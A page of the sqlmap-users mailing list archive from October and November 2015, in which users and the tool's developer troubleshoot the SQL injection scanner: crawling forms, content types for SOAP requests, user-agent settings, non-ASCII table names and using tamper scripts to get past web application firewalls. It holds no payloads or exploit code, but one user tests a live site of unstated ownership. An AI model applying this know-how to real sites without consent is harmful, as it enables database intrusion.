sqlmap-users Mailing List for sqlmap (Page 5)
Brought to you by:
inquisb
Menu
▾
▴
sqlmap-users — sqlmap users mailing list
You can subscribe to this list here.
| 2008 |
Jan
|
Feb
|
Mar
|
Apr
|
May
|
Jun
|
Jul
|
Aug
|
Sep
(4) |
Oct
(11) |
Nov
(24) |
Dec
(13) |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 2009 |
Jan
(23) |
Feb
(17) |
Mar
(13) |
Apr
(48) |
May
(22) |
Jun
(18) |
Jul
(22) |
Aug
(13) |
Sep
(23) |
Oct
(6) |
Nov
(11) |
Dec
(25) |
| 2010 |
Jan
(21) |
Feb
(33) |
Mar
(61) |
Apr
(47) |
May
(48) |
Jun
(30) |
Jul
(24) |
Aug
(37) |
Sep
(52) |
Oct
(59) |
Nov
(32) |
Dec
(57) |
| 2011 |
Jan
(166) |
Feb
(93) |
Mar
(65) |
Apr
(117) |
May
(87) |
Jun
(124) |
Jul
(102) |
Aug
(78) |
Sep
(65) |
Oct
(22) |
Nov
(71) |
Dec
(79) |
| 2012 |
Jan
(93) |
Feb
(55) |
Mar
(45) |
Apr
(49) |
May
(56) |
Jun
(93) |
Jul
(95) |
Aug
(42) |
Sep
(26) |
Oct
(36) |
Nov
(32) |
Dec
(46) |
| 2013 |
Jan
(36) |
Feb
(78) |
Mar
(38) |
Apr
(57) |
May
(35) |
Jun
(39) |
Jul
(23) |
Aug
(33) |
Sep
(28) |
Oct
(38) |
Nov
(22) |
Dec
(16) |
| 2014 |
Jan
(33) |
Feb
(23) |
Mar
(41) |
Apr
(29) |
May
(12) |
Jun
(20) |
Jul
(21) |
Aug
(23) |
Sep
(18) |
Oct
(34) |
Nov
(12) |
Dec
(39) |
| 2015 |
Jan
(2) |
Feb
(51) |
Mar
(10) |
Apr
(28) |
May
(9) |
Jun
(22) |
Jul
(32) |
Aug
(35) |
Sep
(29) |
Oct
(50) |
Nov
(8) |
Dec
(2) |
| 2016 |
Jan
(8) |
Feb
(2) |
Mar
(3) |
Apr
(14) |
May
|
Jun
|
Jul
|
Aug
(12) |
Sep
|
Oct
|
Nov
(1) |
Dec
(19) |
| 2017 |
Jan
|
Feb
(18) |
Mar
|
Apr
(1) |
May
|
Jun
|
Jul
|
Aug
(4) |
Sep
|
Oct
|
Nov
(2) |
Dec
|
| 2018 |
Jan
|
Feb
|
Mar
(1) |
Apr
(1) |
May
(3) |
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
| 2019 |
Jan
|
Feb
|
Mar
|
Apr
(3) |
May
|
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
|
From: Miroslav S. <mir...@gm...> - 2015-11-12 11:05:33
|
https://github.com/sqlmapproject/sqlmap/issues/1531 Bye On Thu, Nov 12, 2015 at 4:44 AM, Jerry_Zhang_ <hot...@qq...> wrote: > hi, > > I want to display the non-ascii table name with boolean blind injection? > i tried all the ways i could find from the internet, but none of them > seems work in my case. > > 1. append --charset=UTF-8 > 2. append "# -*- coding: utf-8 -*-" to sqlmap.py > 3. copy from log to other editor. > > Does anyone have success deal with Non-ascii tablename? for example, > chinese. > > ------------------ > Best Regards! > Zhang Nan > > > > ------------------------------------------------------------------------------ > > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
|
From: J. <hot...@qq...> - 2015-11-12 03:44:39
|
hi, I want to display the non-ascii table name with boolean blind injection? i tried all the ways i could find from the internet, but none of them seems work in my case. 1. append --charset=UTF-8 2. append "# -*- coding: utf-8 -*-" to sqlmap.py 3. copy from log to other editor. Does anyone have success deal with Non-ascii tablename? for example, chinese. ------------------ Best Regards! Zhang Nan |
|
From: Miroslav S. <mir...@gm...> - 2015-10-28 13:04:59
|
With the latest commit you'll see something like this: --- [#1] form: POST http://testphp.vulnweb.com:80/search.php?test=query POST data: searchFor=&goButton=go do you want to test this form? [Y/n/q] > n URL 2: GET http://testphp.vulnweb.com:80/artists.php?artist=1 do you want to test this URL? [Y/n/q] > n --- Bye On Wed, Oct 28, 2015 at 1:56 PM, Miroslav Stampar < mir...@gm...> wrote: > This is not really the case. > > --- > > $ python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" > --forms --crawl=1 > _ > ___ ___| |_____ ___ ___ {1.0-dev-caafa37} > |_ -| . | | | .'| . | > |___|_ |_|_|_|_|__,| _| > |_| |_| http://sqlmap.org > > [!] legal disclaimer: Usage of sqlmap for attacking targets without prior > mutual consent is illegal. It is the end user's responsibility to obey all > applicable local, state and federal laws. Developers assume no liability > and are not responsible for any misuse or damage caused by this program > > [*] starting at 13:54:32 > > do you want to check for the existence of site's sitemap(.xml) [y/N] > [13:54:34] [INFO] starting crawler > [13:54:34] [INFO] searching for links with depth 1 > do you want to store crawling results to a temporary file for eventual > further processing with other tools [y/N] > > > [13:54:36] [INFO] sqlmap got a total of 4 targets > [#1] form: > POST http://testphp.vulnweb.com:80/search.php?test=query > POST data: searchFor=&goButton=go > do you want to test this form? [Y/n/q] > > n > [#2] form: > GET http://testphp.vulnweb.com:80/artists.php?artist=1 > do you want to test this form? [Y/n/q] > > n > [#3] form: > GET http://testphp.vulnweb.com:80/artists.php?artist=2 > do you want to test this form? [Y/n/q] > > n > [#4] form: > GET http://testphp.vulnweb.com:80/artists.php?artist=3 > do you want to test this form? [Y/n/q] > > n > > [*] shutting down at 13:54:47 > > --- > > > The only clumsy thing here is that everything is called "form" afterwards. > Will make a dirty patch for this in couple of mins. > > Bye > > On Wed, Oct 28, 2015 at 10:55 AM, David Wray <da...@se...> wrote: > >> Hi, >> >> It seems when using —crawl to spider a site, using —forms overrides >> normal behaviour, and hence ignores URL based variables. Is there a simple >> way to —crawl a site and test for both URL and forms based variables? In >> other words, to augment normal behaviour and —forms behaviour together. >> >> Thanks >> >> D >> >> >> >> ------------------------------------------------------------------------------ >> >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > > > -- > Miroslav Stampar > http://about.me/stamparm > -- Miroslav Stampar http://about.me/stamparm |
|
From: Miroslav S. <mir...@gm...> - 2015-10-28 12:56:13
|
This is not really the case. --- $ python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --forms --crawl=1 _ ___ ___| |_____ ___ ___ {1.0-dev-caafa37} |_ -| . | | | .'| . | |___|_ |_|_|_|_|__,| _| |_| |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 13:54:32 do you want to check for the existence of site's sitemap(.xml) [y/N] [13:54:34] [INFO] starting crawler [13:54:34] [INFO] searching for links with depth 1 do you want to store crawling results to a temporary file for eventual further processing with other tools [y/N] [13:54:36] [INFO] sqlmap got a total of 4 targets [#1] form: POST http://testphp.vulnweb.com:80/search.php?test=query POST data: searchFor=&goButton=go do you want to test this form? [Y/n/q] > n [#2] form: GET http://testphp.vulnweb.com:80/artists.php?artist=1 do you want to test this form? [Y/n/q] > n [#3] form: GET http://testphp.vulnweb.com:80/artists.php?artist=2 do you want to test this form? [Y/n/q] > n [#4] form: GET http://testphp.vulnweb.com:80/artists.php?artist=3 do you want to test this form? [Y/n/q] > n [*] shutting down at 13:54:47 --- The only clumsy thing here is that everything is called "form" afterwards. Will make a dirty patch for this in couple of mins. Bye On Wed, Oct 28, 2015 at 10:55 AM, David Wray <da...@se...> wrote: > Hi, > > It seems when using —crawl to spider a site, using —forms overrides normal > behaviour, and hence ignores URL based variables. Is there a simple way to > —crawl a site and test for both URL and forms based variables? In other > words, to augment normal behaviour and —forms behaviour together. > > Thanks > > D > > > > ------------------------------------------------------------------------------ > > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
|
From: David W. <da...@se...> - 2015-10-28 10:10:15
|
Hi, It seems when using -crawl to spider a site, using -forms overrides normal behaviour, and hence ignores URL based variables. Is there a simple way to -crawl a site and test for both URL and forms based variables? In other words, to augment normal behaviour and -forms behaviour together. Thanks D |
|
From: Miroslav S. <mir...@gm...> - 2015-10-26 09:49:19
|
Great that you've managed to solve it by yourself :) Bye p.s. thx for donation On Sun, Oct 25, 2015 at 4:49 PM, Rodrigo Zanatta Silva < rod...@gm...> wrote: > Now I solve the problem!!!! > > This was MY MISTAKE!!! All I need to do was send the --user-agent exactly > curl was doing. I configure it by --header option, but the correct was use > --user-agent (because it send as sqlmap user agent and faill with the > actual session) > > sqlmap is really a great program!!! > > 2015-10-25 13:09 GMT-02:00 Rodrigo Zanatta Silva < > rod...@gm...>: > >> ok, I did it now. Check your e-mail. Sorry for the delay. Check your >> e-mail. >> >> I send this mail about 4AM and I need to sleep :) now is 1PM but today >> is sunday >> >> 2015-10-25 8:26 GMT-02:00 Miroslav Stampar <mir...@gm...>: >> >>> Can you please send me privately the URL? >>> >>> Bye >>> >>> On Sun, Oct 25, 2015 at 7:51 AM, Rodrigo Zanatta Silva < >>> rod...@gm...> wrote: >>> >>>> I am having bad times with sqlmap. >>>> >>>> I can create a command with curl and I can see that the website is >>>> vulnerable. But if I try to mimic the same command with sqlmap, something >>>> goes wrong and I can't have sucess wit any request in the site. Maybe it is >>>> because sqlmap use another codding. >>>> >>>> Can I use something similar to it: >>>> >>>> >>>> - I write the cURL command and set the place I want sqlmap inject >>>> the payload >>>> - The cURL do the request and write a file >>>> - The sqlmap process the file and continue as normal >>>> >>>> The unique difference is: sqlmap WILL NOT do the internet request. Only >>>> cURL will do it. >>>> >>>> If I can't do it, where can I change it in source code to try to do >>>> this? >>>> >>>> >>>> >>>> ------------------------------------------------------------------------------ >>>> >>>> _______________________________________________ >>>> sqlmap-users mailing list >>>> sql...@li... >>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>>> >>>> >>> >>> >>> -- >>> Miroslav Stampar >>> http://about.me/stamparm >>> >> >> > -- Miroslav Stampar http://about.me/stamparm |
|
From: Rodrigo Z. S. <rod...@gm...> - 2015-10-25 15:50:18
|
Now I solve the problem!!!! This was MY MISTAKE!!! All I need to do was send the --user-agent exactly curl was doing. I configure it by --header option, but the correct was use --user-agent (because it send as sqlmap user agent and faill with the actual session) sqlmap is really a great program!!! 2015-10-25 13:09 GMT-02:00 Rodrigo Zanatta Silva < rod...@gm...>: > ok, I did it now. Check your e-mail. Sorry for the delay. Check your > e-mail. > > I send this mail about 4AM and I need to sleep :) now is 1PM but today > is sunday > > 2015-10-25 8:26 GMT-02:00 Miroslav Stampar <mir...@gm...>: > >> Can you please send me privately the URL? >> >> Bye >> >> On Sun, Oct 25, 2015 at 7:51 AM, Rodrigo Zanatta Silva < >> rod...@gm...> wrote: >> >>> I am having bad times with sqlmap. >>> >>> I can create a command with curl and I can see that the website is >>> vulnerable. But if I try to mimic the same command with sqlmap, something >>> goes wrong and I can't have sucess wit any request in the site. Maybe it is >>> because sqlmap use another codding. >>> >>> Can I use something similar to it: >>> >>> >>> - I write the cURL command and set the place I want sqlmap inject >>> the payload >>> - The cURL do the request and write a file >>> - The sqlmap process the file and continue as normal >>> >>> The unique difference is: sqlmap WILL NOT do the internet request. Only >>> cURL will do it. >>> >>> If I can't do it, where can I change it in source code to try to do this? >>> >>> >>> >>> ------------------------------------------------------------------------------ >>> >>> _______________________________________________ >>> sqlmap-users mailing list >>> sql...@li... >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>> >>> >> >> >> -- >> Miroslav Stampar >> http://about.me/stamparm >> > > |
|
From: Rodrigo Z. S. <rod...@gm...> - 2015-10-25 15:10:02
|
ok, I did it now. Check your e-mail. Sorry for the delay. Check your e-mail. I send this mail about 4AM and I need to sleep :) now is 1PM but today is sunday 2015-10-25 8:26 GMT-02:00 Miroslav Stampar <mir...@gm...>: > Can you please send me privately the URL? > > Bye > > On Sun, Oct 25, 2015 at 7:51 AM, Rodrigo Zanatta Silva < > rod...@gm...> wrote: > >> I am having bad times with sqlmap. >> >> I can create a command with curl and I can see that the website is >> vulnerable. But if I try to mimic the same command with sqlmap, something >> goes wrong and I can't have sucess wit any request in the site. Maybe it is >> because sqlmap use another codding. >> >> Can I use something similar to it: >> >> >> - I write the cURL command and set the place I want sqlmap inject the >> payload >> - The cURL do the request and write a file >> - The sqlmap process the file and continue as normal >> >> The unique difference is: sqlmap WILL NOT do the internet request. Only >> cURL will do it. >> >> If I can't do it, where can I change it in source code to try to do this? >> >> >> >> ------------------------------------------------------------------------------ >> >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > > > -- > Miroslav Stampar > http://about.me/stamparm > |
|
From: Miroslav S. <mir...@gm...> - 2015-10-25 10:26:27
|
Can you please send me privately the URL? Bye On Sun, Oct 25, 2015 at 7:51 AM, Rodrigo Zanatta Silva < rod...@gm...> wrote: > I am having bad times with sqlmap. > > I can create a command with curl and I can see that the website is > vulnerable. But if I try to mimic the same command with sqlmap, something > goes wrong and I can't have sucess wit any request in the site. Maybe it is > because sqlmap use another codding. > > Can I use something similar to it: > > > - I write the cURL command and set the place I want sqlmap inject the > payload > - The cURL do the request and write a file > - The sqlmap process the file and continue as normal > > The unique difference is: sqlmap WILL NOT do the internet request. Only > cURL will do it. > > If I can't do it, where can I change it in source code to try to do this? > > > > ------------------------------------------------------------------------------ > > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
|
From: Rodrigo Z. S. <rod...@gm...> - 2015-10-25 06:52:22
|
I am having bad times with sqlmap. I can create a command with curl and I can see that the website is vulnerable. But if I try to mimic the same command with sqlmap, something goes wrong and I can't have sucess wit any request in the site. Maybe it is because sqlmap use another codding. Can I use something similar to it: - I write the cURL command and set the place I want sqlmap inject the payload - The cURL do the request and write a file - The sqlmap process the file and continue as normal The unique difference is: sqlmap WILL NOT do the internet request. Only cURL will do it. If I can't do it, where can I change it in source code to try to do this? |
|
From: Miroslav S. <mir...@gm...> - 2015-10-21 08:24:07
|
Hi. In practice you can try any of those tamper scripts. Maybe you'll get lucky. In theory, you should know both the WAF and the DBMS involved. Also, big thing is that you should know how to bypass it manually before doing anything with tamper scripts or sqlmap in general. Bye On Wed, Oct 21, 2015 at 9:40 AM, Indra Zulkarnain <net...@gm...> wrote: > guys > > is it true that to bypass the web application firewall I need to know > what programming language and database that being used > > or just the database > > > > thanks > Indra Z > > -- > --from the net with zero space-- > > > ------------------------------------------------------------------------------ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar http://about.me/stamparm |
|
From: Indra Z. <net...@gm...> - 2015-10-21 07:40:15
|
guys is it true that to bypass the web application firewall I need to know what programming language and database that being used or just the database thanks Indra Z -- --from the net with zero space-- |
|
From: Brandon P. <bpe...@gm...> - 2015-10-20 01:08:17
|
I am magically unable to reproduce this at the moment. If I end up seeing the behavior again, I will get more information to reproduce with. However, I did realize that I no longer actually need —skip-urlencode. At some point between when I last touched this code and now, POST request bodies are no longer URL encoded. In any case, sorry for the noise. > On Oct 19, 2015, at 12:08 PM, Miroslav Stampar <mir...@gm...> wrote: > > Either through request file or headers. Otherwise, sqlmap automatically sets it based on recognized type (e.g. application/json for JSON) > > Bye > > On Oct 19, 2015 7:05 PM, "Brandon Perry" <bpe...@gm... <mailto:bpe...@gm...>> wrote: > Just curious, how do you expect a user to set a specific content type? Is there are argument I am missing, or is --headers the expected way? > > On Mon, Oct 19, 2015 at 9:41 AM, Miroslav Stampar <mir...@gm... <mailto:mir...@gm...>> wrote: > I really can't enforce this behavior. Waiting for your sample. > > Bye > > On Mon, Oct 19, 2015 at 4:04 PM, Brandon Perry <bpe...@gm... <mailto:bpe...@gm...>> wrote: > Yes, I can, but it will have to be when I get home this evening. > > FWIW, I am interacting with the sqlmap API, so not passing it a request file. I am building the SOAP XML programmatically, then setting it as the 'data' in the options (along with headers to specify text/xml and SOAPAction), with skipUrlEncode. > > On Mon, Oct 19, 2015 at 9:02 AM, Miroslav Stampar <mir...@gm... <mailto:mir...@gm...>> wrote: > Hi. > > But sqlmap should automatically skip the url encoding of such request bodies if the content-type has been set to the proper value from start (or if there was no content-type from the beginning). > > Can you please send a sample request file and/or used sqlmap options. > > Bye > > On Mon, Oct 19, 2015 at 4:00 PM, Brandon Perry <bpe...@gm... <mailto:bpe...@gm...>> wrote: > The actual request is a SOAP payload, which requires a content type of XML, and no URL encoding (which, if performed, returns a 50x). > > On Mon, Oct 19, 2015 at 6:37 AM, Miroslav Stampar <mir...@gm... <mailto:mir...@gm...>> wrote: > Hi Brandon. > > Sorry for late reply. It goes like this. > > Your header value for content-type should be propagated/used, even in this case, in all cases THAN one. > > If you use --skip-urlencode and you (or your request file) state that the content-type should be "urlencoded" sqlmap forces switch to either the "recognized" (e.g. json, xml,...) or the "plain". So, that line that you've pinpointed will be triggered only in described situation. > > Can you please describe what are you trying to accomplish? I believe that you are trying to leave some parts (non-payload) url encoded, while you want payload to not be url encoded. > > Bye > > On Sun, Oct 18, 2015 at 11:35 AM, Miroslav Stampar <mir...@gm... <mailto:mir...@gm...>> wrote: > Will patch it later today. > > Bye > > On Oct 17, 2015 04:32, "Brandon Perry" <bpe...@gm... <mailto:bpe...@gm...>> wrote: > I tracked it down to ./lib/request/connect.py, line 726. > > contentType = POST_HINT_CONTENT_TYPES.get(kb.postHint, PLAIN_TEXT_CONTENT_TYPE) > > I am specifying a content type explicitly with —headers, so commenting this line out allowed sqlmap to detect the injections (the server returns 50x if the content type isn't right). > > Not sure what the correct solution is to this, as I understand the intent. Would this be more useful as a github issue? > ------------------------------------------------------------------------------ > _______________________________________________ > sqlmap-users mailing list > sql...@li... <mailto:sql...@li...> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users <https://lists.sourceforge.net/lists/listinfo/sqlmap-users> > > > > -- > Miroslav Stampar > http://about.me/stamparm <http://about.me/stamparm> > > > -- > http://volatile-minds.blogspot.com <http://volatile-minds.blogspot.com/> -- blog > http://www.volatileminds.net <http://www.volatileminds.net/> -- website > > > > -- > Miroslav Stampar > http://about.me/stamparm <http://about.me/stamparm> > > > -- > http://volatile-minds.blogspot.com <http://volatile-minds.blogspot.com/> -- blog > http://www.volatileminds.net <http://www.volatileminds.net/> -- website > > > > -- > Miroslav Stampar > http://about.me/stamparm <http://about.me/stamparm> > > > -- > http://volatile-minds.blogspot.com <http://volatile-minds.blogspot.com/> -- blog > http://www.volatileminds.net <http://www.volatileminds.net/> -- website |
|
From: Miroslav S. <mir...@gm...> - 2015-10-19 17:08:53
|
Either through request file or headers. Otherwise, sqlmap automatically sets it based on recognized type (e.g. application/json for JSON) Bye On Oct 19, 2015 7:05 PM, "Brandon Perry" <bpe...@gm...> wrote: > Just curious, how do you expect a user to set a specific content type? Is > there are argument I am missing, or is --headers the expected way? > > On Mon, Oct 19, 2015 at 9:41 AM, Miroslav Stampar < > mir...@gm...> wrote: > >> I really can't enforce this behavior. Waiting for your sample. >> >> Bye >> >> On Mon, Oct 19, 2015 at 4:04 PM, Brandon Perry <bpe...@gm... >> > wrote: >> >>> Yes, I can, but it will have to be when I get home this evening. >>> >>> FWIW, I am interacting with the sqlmap API, so not passing it a request >>> file. I am building the SOAP XML programmatically, then setting it as the >>> 'data' in the options (along with headers to specify text/xml and >>> SOAPAction), with skipUrlEncode. >>> >>> On Mon, Oct 19, 2015 at 9:02 AM, Miroslav Stampar < >>> mir...@gm...> wrote: >>> >>>> Hi. >>>> >>>> But sqlmap should automatically skip the url encoding of such request >>>> bodies if the content-type has been set to the proper value from start (or >>>> if there was no content-type from the beginning). >>>> >>>> Can you please send a sample request file and/or used sqlmap options. >>>> >>>> Bye >>>> >>>> On Mon, Oct 19, 2015 at 4:00 PM, Brandon Perry < >>>> bpe...@gm...> wrote: >>>> >>>>> The actual request is a SOAP payload, which requires a content type of >>>>> XML, and no URL encoding (which, if performed, returns a 50x). >>>>> >>>>> On Mon, Oct 19, 2015 at 6:37 AM, Miroslav Stampar < >>>>> mir...@gm...> wrote: >>>>> >>>>>> Hi Brandon. >>>>>> >>>>>> Sorry for late reply. It goes like this. >>>>>> >>>>>> Your header value for content-type should be propagated/used, even in >>>>>> this case, in all cases THAN one. >>>>>> >>>>>> If you use --skip-urlencode and you (or your request file) state that >>>>>> the content-type should be "urlencoded" sqlmap forces switch to either the >>>>>> "recognized" (e.g. json, xml,...) or the "plain". So, that line that you've >>>>>> pinpointed will be triggered only in described situation. >>>>>> >>>>>> Can you please describe what are you trying to accomplish? I believe >>>>>> that you are trying to leave some parts (non-payload) url encoded, while >>>>>> you want payload to not be url encoded. >>>>>> >>>>>> Bye >>>>>> >>>>>> On Sun, Oct 18, 2015 at 11:35 AM, Miroslav Stampar < >>>>>> mir...@gm...> wrote: >>>>>> >>>>>>> Will patch it later today. >>>>>>> >>>>>>> Bye >>>>>>> On Oct 17, 2015 04:32, "Brandon Perry" <bpe...@gm...> >>>>>>> wrote: >>>>>>> >>>>>>>> I tracked it down to ./lib/request/connect.py, line 726. >>>>>>>> >>>>>>>> contentType = POST_HINT_CONTENT_TYPES.get(kb.postHint, >>>>>>>> PLAIN_TEXT_CONTENT_TYPE) >>>>>>>> >>>>>>>> I am specifying a content type explicitly with —headers, so >>>>>>>> commenting this line out allowed sqlmap to detect the injections (the >>>>>>>> server returns 50x if the content type isn't right). >>>>>>>> >>>>>>>> Not sure what the correct solution is to this, as I understand the >>>>>>>> intent. Would this be more useful as a github issue? >>>>>>>> >>>>>>>> ------------------------------------------------------------------------------ >>>>>>>> _______________________________________________ >>>>>>>> sqlmap-users mailing list >>>>>>>> sql...@li... >>>>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>>>>>>> >>>>>>> >>>>>> >>>>>> >>>>>> -- >>>>>> Miroslav Stampar >>>>>> http://about.me/stamparm >>>>>> >>>>> >>>>> >>>>> >>>>> -- >>>>> http://volatile-minds.blogspot.com -- blog >>>>> http://www.volatileminds.net -- website >>>>> >>>> >>>> >>>> >>>> -- >>>> Miroslav Stampar >>>> http://about.me/stamparm >>>> >>> >>> >>> >>> -- >>> http://volatile-minds.blogspot.com -- blog >>> http://www.volatileminds.net -- website >>> >> >> >> >> -- >> Miroslav Stampar >> http://about.me/stamparm >> > > > > -- > http://volatile-minds.blogspot.com -- blog > http://www.volatileminds.net -- website > |
|
From: Brandon P. <bpe...@gm...> - 2015-10-19 17:05:51
|
Just curious, how do you expect a user to set a specific content type? Is there are argument I am missing, or is --headers the expected way? On Mon, Oct 19, 2015 at 9:41 AM, Miroslav Stampar < mir...@gm...> wrote: > I really can't enforce this behavior. Waiting for your sample. > > Bye > > On Mon, Oct 19, 2015 at 4:04 PM, Brandon Perry <bpe...@gm...> > wrote: > >> Yes, I can, but it will have to be when I get home this evening. >> >> FWIW, I am interacting with the sqlmap API, so not passing it a request >> file. I am building the SOAP XML programmatically, then setting it as the >> 'data' in the options (along with headers to specify text/xml and >> SOAPAction), with skipUrlEncode. >> >> On Mon, Oct 19, 2015 at 9:02 AM, Miroslav Stampar < >> mir...@gm...> wrote: >> >>> Hi. >>> >>> But sqlmap should automatically skip the url encoding of such request >>> bodies if the content-type has been set to the proper value from start (or >>> if there was no content-type from the beginning). >>> >>> Can you please send a sample request file and/or used sqlmap options. >>> >>> Bye >>> >>> On Mon, Oct 19, 2015 at 4:00 PM, Brandon Perry < >>> bpe...@gm...> wrote: >>> >>>> The actual request is a SOAP payload, which requires a content type of >>>> XML, and no URL encoding (which, if performed, returns a 50x). >>>> >>>> On Mon, Oct 19, 2015 at 6:37 AM, Miroslav Stampar < >>>> mir...@gm...> wrote: >>>> >>>>> Hi Brandon. >>>>> >>>>> Sorry for late reply. It goes like this. >>>>> >>>>> Your header value for content-type should be propagated/used, even in >>>>> this case, in all cases THAN one. >>>>> >>>>> If you use --skip-urlencode and you (or your request file) state that >>>>> the content-type should be "urlencoded" sqlmap forces switch to either the >>>>> "recognized" (e.g. json, xml,...) or the "plain". So, that line that you've >>>>> pinpointed will be triggered only in described situation. >>>>> >>>>> Can you please describe what are you trying to accomplish? I believe >>>>> that you are trying to leave some parts (non-payload) url encoded, while >>>>> you want payload to not be url encoded. >>>>> >>>>> Bye >>>>> >>>>> On Sun, Oct 18, 2015 at 11:35 AM, Miroslav Stampar < >>>>> mir...@gm...> wrote: >>>>> >>>>>> Will patch it later today. >>>>>> >>>>>> Bye >>>>>> On Oct 17, 2015 04:32, "Brandon Perry" <bpe...@gm...> >>>>>> wrote: >>>>>> >>>>>>> I tracked it down to ./lib/request/connect.py, line 726. >>>>>>> >>>>>>> contentType = POST_HINT_CONTENT_TYPES.get(kb.postHint, >>>>>>> PLAIN_TEXT_CONTENT_TYPE) >>>>>>> >>>>>>> I am specifying a content type explicitly with —headers, so >>>>>>> commenting this line out allowed sqlmap to detect the injections (the >>>>>>> server returns 50x if the content type isn't right). >>>>>>> >>>>>>> Not sure what the correct solution is to this, as I understand the >>>>>>> intent. Would this be more useful as a github issue? >>>>>>> >>>>>>> ------------------------------------------------------------------------------ >>>>>>> _______________________________________________ >>>>>>> sqlmap-users mailing list >>>>>>> sql...@li... >>>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>>>>>> >>>>>> >>>>> >>>>> >>>>> -- >>>>> Miroslav Stampar >>>>> http://about.me/stamparm >>>>> >>>> >>>> >>>> >>>> -- >>>> http://volatile-minds.blogspot.com -- blog >>>> http://www.volatileminds.net -- website >>>> >>> >>> >>> >>> -- >>> Miroslav Stampar >>> http://about.me/stamparm >>> >> >> >> >> -- >> http://volatile-minds.blogspot.com -- blog >> http://www.volatileminds.net -- website >> > > > > -- > Miroslav Stampar > http://about.me/stamparm > -- http://volatile-minds.blogspot.com -- blog http://www.volatileminds.net -- website |
|
From: Miroslav S. <mir...@gm...> - 2015-10-19 14:41:32
|
I really can't enforce this behavior. Waiting for your sample. Bye On Mon, Oct 19, 2015 at 4:04 PM, Brandon Perry <bpe...@gm...> wrote: > Yes, I can, but it will have to be when I get home this evening. > > FWIW, I am interacting with the sqlmap API, so not passing it a request > file. I am building the SOAP XML programmatically, then setting it as the > 'data' in the options (along with headers to specify text/xml and > SOAPAction), with skipUrlEncode. > > On Mon, Oct 19, 2015 at 9:02 AM, Miroslav Stampar < > mir...@gm...> wrote: > >> Hi. >> >> But sqlmap should automatically skip the url encoding of such request >> bodies if the content-type has been set to the proper value from start (or >> if there was no content-type from the beginning). >> >> Can you please send a sample request file and/or used sqlmap options. >> >> Bye >> >> On Mon, Oct 19, 2015 at 4:00 PM, Brandon Perry <bpe...@gm... >> > wrote: >> >>> The actual request is a SOAP payload, which requires a content type of >>> XML, and no URL encoding (which, if performed, returns a 50x). >>> >>> On Mon, Oct 19, 2015 at 6:37 AM, Miroslav Stampar < >>> mir...@gm...> wrote: >>> >>>> Hi Brandon. >>>> >>>> Sorry for late reply. It goes like this. >>>> >>>> Your header value for content-type should be propagated/used, even in >>>> this case, in all cases THAN one. >>>> >>>> If you use --skip-urlencode and you (or your request file) state that >>>> the content-type should be "urlencoded" sqlmap forces switch to either the >>>> "recognized" (e.g. json, xml,...) or the "plain". So, that line that you've >>>> pinpointed will be triggered only in described situation. >>>> >>>> Can you please describe what are you trying to accomplish? I believe >>>> that you are trying to leave some parts (non-payload) url encoded, while >>>> you want payload to not be url encoded. >>>> >>>> Bye >>>> >>>> On Sun, Oct 18, 2015 at 11:35 AM, Miroslav Stampar < >>>> mir...@gm...> wrote: >>>> >>>>> Will patch it later today. >>>>> >>>>> Bye >>>>> On Oct 17, 2015 04:32, "Brandon Perry" <bpe...@gm...> >>>>> wrote: >>>>> >>>>>> I tracked it down to ./lib/request/connect.py, line 726. >>>>>> >>>>>> contentType = POST_HINT_CONTENT_TYPES.get(kb.postHint, >>>>>> PLAIN_TEXT_CONTENT_TYPE) >>>>>> >>>>>> I am specifying a content type explicitly with —headers, so >>>>>> commenting this line out allowed sqlmap to detect the injections (the >>>>>> server returns 50x if the content type isn't right). >>>>>> >>>>>> Not sure what the correct solution is to this, as I understand the >>>>>> intent. Would this be more useful as a github issue? >>>>>> >>>>>> ------------------------------------------------------------------------------ >>>>>> _______________________________________________ >>>>>> sqlmap-users mailing list >>>>>> sql...@li... >>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>>>>> >>>>> >>>> >>>> >>>> -- >>>> Miroslav Stampar >>>> http://about.me/stamparm >>>> >>> >>> >>> >>> -- >>> http://volatile-minds.blogspot.com -- blog >>> http://www.volatileminds.net -- website >>> >> >> >> >> -- >> Miroslav Stampar >> http://about.me/stamparm >> > > > > -- > http://volatile-minds.blogspot.com -- blog > http://www.volatileminds.net -- website > -- Miroslav Stampar http://about.me/stamparm |
|
From: Brandon P. <bpe...@gm...> - 2015-10-19 14:04:59
|
